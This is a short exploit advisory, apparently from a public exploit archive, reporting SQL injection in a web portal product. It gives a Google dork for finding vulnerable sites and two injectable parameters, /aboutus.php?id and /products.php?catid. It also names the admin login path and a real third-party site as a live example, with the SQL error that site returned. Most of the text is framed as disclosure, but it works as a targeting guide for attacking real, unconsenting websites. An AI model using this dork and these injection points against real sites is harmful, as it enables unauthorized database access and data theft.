################################################################################### # Exploit Title : Drupal ArabDevelopmentPortal Egypt 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepages : arabportal.net / arabdevelopmentportal.com # Tested On : Windows # Exploit Risk : Medium # Version Information : Apache 2.4.18 - PHP 7.0.30 - Ubuntu OS - 1.0 # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050279 ################################################################################### Copyright A(c) 2018 Designed by ArabPortals Development Egypt SQL Injection Vulnerability ################################################################################### # Google Dork : intext:''Copyright A(c) 2018 Designed by Arab Portals'' # Exploit : /aboutus.php?id=[SQL Injection] # Exploit : /products.php?catid=[SQL Injection] Admin Login Path => /admin/ ################################################################################### # Example Site => petrozas.com/aboutus.php?id=2%27 => [ Proof of Concept for SQL Injection ] => archive.is/oMSsJ # SQL/DB Error : Mysql say You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' order by id ASC limit 1' at line 1 ################################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################################